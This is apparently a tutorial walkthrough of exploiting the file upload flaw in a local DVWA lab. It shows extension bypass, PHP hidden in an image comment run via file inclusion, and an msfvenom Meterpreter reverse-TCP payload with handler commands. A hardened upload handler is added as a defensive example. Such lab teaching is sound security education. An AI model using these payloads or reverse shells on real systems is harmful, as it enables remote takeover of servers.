I am so excited: today we will be using Grumpy Cat to execute code. The cat is a legend.
Alright, let's start at the beginning. I already covered File Inclusion as a source of vulnerabilities; today I will cover File Upload.
As always, low security basically means no security whatsoever, so let's create a PHP file that we will use for our upload. I will call it hack.php:
<?php echo "Hacked"; ?>
When the code in our script executes it will print “Hacked”. Let's try and upload this PHP file.
The interface quite nicely shows us that the file is located at ../../hackable/uploads/hack.php, so all we need to do is find a way to execute the file.
In this case we can literally just paste the path into the address bar and request the file: http://localhost:32770/vulnerabilities/upload/../../hackable/uploads/hack.php. The code from the script ran on the server and the screen shows us “Hacked”.
Let's try and upload the same file again.
Sadly it will only accept PNG images. So what happens if we just rename the file? Let's rename the file to hack.php.png and try to upload it!
It uploads just fine! Now, let's run the code! The address will be almost the same as before: http://localhost:32770/vulnerabilities/upload/../../hackable/uploads/hack.php.png, but the result is quite different!
It tried to display the image to us, which is not what we want! Luckily we can use the File Inclusion vulnerability we found earlier to run this code. Let's craft a URL that will work even on the high setting: http://localhost:32770/vulnerabilities/fi/?page=file:///app/hackable/uploads/hack.php.png. Run it and let's see the result:
That is more like it: the “picture” was included and its contents were executed as PHP code.
Now for the real challenge. None of the previous attacks work at this level; the system will only accept images. But did you know images can carry plain text content as well? If you open any image, say of Grumpy Cat, in GIMP (or any other image editor) you can take a look at the image properties. It has a field called Comment where you can add any text you want, including code.
In this case I chose to output phpinfo(), because if you include only “Hacked” it will be very hard to find among the rest of the output of the image.
Let's upload this image and then execute it through our file inclusion technique.
Sure enough, we now have the output from phpinfo() on our screen. This is due to the upload process not stripping the metadata from the image and the PHP interpreter trying very hard to find something it can execute.
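A defender's counterpart to the upload code discussed above, as an added example (not DVWA's own code): an upload handler that ignores the client-supplied name and type, sniffs the real content, re-encodes the image with GD so the Comment/EXIF metadata is dropped, and stores it under a random name outside the web root. The form field name "uploaded" and the directory path are assumptions.

```php
<?php
// Hardened image upload handler (added example, not DVWA's own code).
// Assumptions: the form field is named "uploaded" and UPLOAD_DIR is outside the web root.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app/private_uploads'; // assumed path, never served directly
const MAX_BYTES  = 2 * 1024 * 1024;

function storeImageUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Ignore the client-supplied name and Content-Type; sniff the actual bytes instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $decoders = ['image/png' => 'imagecreatefrompng', 'image/jpeg' => 'imagecreatefromjpeg'];
    if (!isset($decoders[$mime])) {
        throw new RuntimeException('only PNG or JPEG accepted');
    }
    // Decode and re-encode with GD: the written file holds pixel data only, so PNG text
    // chunks and EXIF/JPEG comments (where "<?php" can hide) do not survive.
    $img = @$decoders[$mime]($file['tmp_name']);
    if ($img === false) {
        throw new RuntimeException('not a decodable image');
    }
    // Server-chosen random name with a fixed extension, so hack.php.png cannot be kept.
    $name = bin2hex(random_bytes(16)) . '.png';
    $dest = UPLOAD_DIR . '/' . $name;
    if (!imagepng($img, $dest)) {
        throw new RuntimeException('could not write image');
    }
    imagedestroy($img);
    chmod($dest, 0644);
    return $name; // map this id to a download endpoint; the file is never included or executed
}

try {
    echo 'stored as ' . htmlspecialchars(storeImageUpload($_FILES['uploaded'] ?? []), ENT_QUOTES, 'UTF-8');
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
}
```

Re-encoding defeats the metadata trick, but the file inclusion hole is a separate bug: even a clean image must never be passed to include(), so the inclusion page needs its own fix.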
So, let's try and get shell access again based on this technique. We will use the Metasploit Framework that comes with Kali Linux.
The first thing to do is to generate a PHP file that can connect back to our Kali machine from our DVWA instance. Metasploit ships a tool called msfvenom. It is a payload generator and encoder; you can use it to add payloads to regular programs as well as to a plain old PHP file.
msfvenom --arch php --platform php --payload php/meterpreter/reverse_tcp LHOST=172.18.0.1 LPORT=8080 > exploit.php
The command creates a PHP file (--platform php) carrying the payload (--payload), and we pass it the LHOST (local host) and LPORT (local port) of the Kali instance. The output is written to exploit.php. Take a look at the code and see if you can figure out what it will do, I will wait.
The exploit will open a socket connection over which Metasploit can send commands, just as the name advertises. The first thing to do now is to let Metasploit (type msfconsole in a terminal) listen on port 8080 to receive this connection.
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[-] Handler failed to bind to 172.18.0.1:8080:-  -
[*] Started reverse TCP handler on 0.0.0.0:8080
[*] Starting the payload handler...
The exploit/multi/handler module lets us set a payload (reverse_tcp) to be run as a meterpreter listener. When we upload the exploit code and run it, it will connect to this payload handler.
The browser tab will keep “loading” the page, but you now have full access to the machine! That's how easy it is to actually take advantage of such a vulnerability.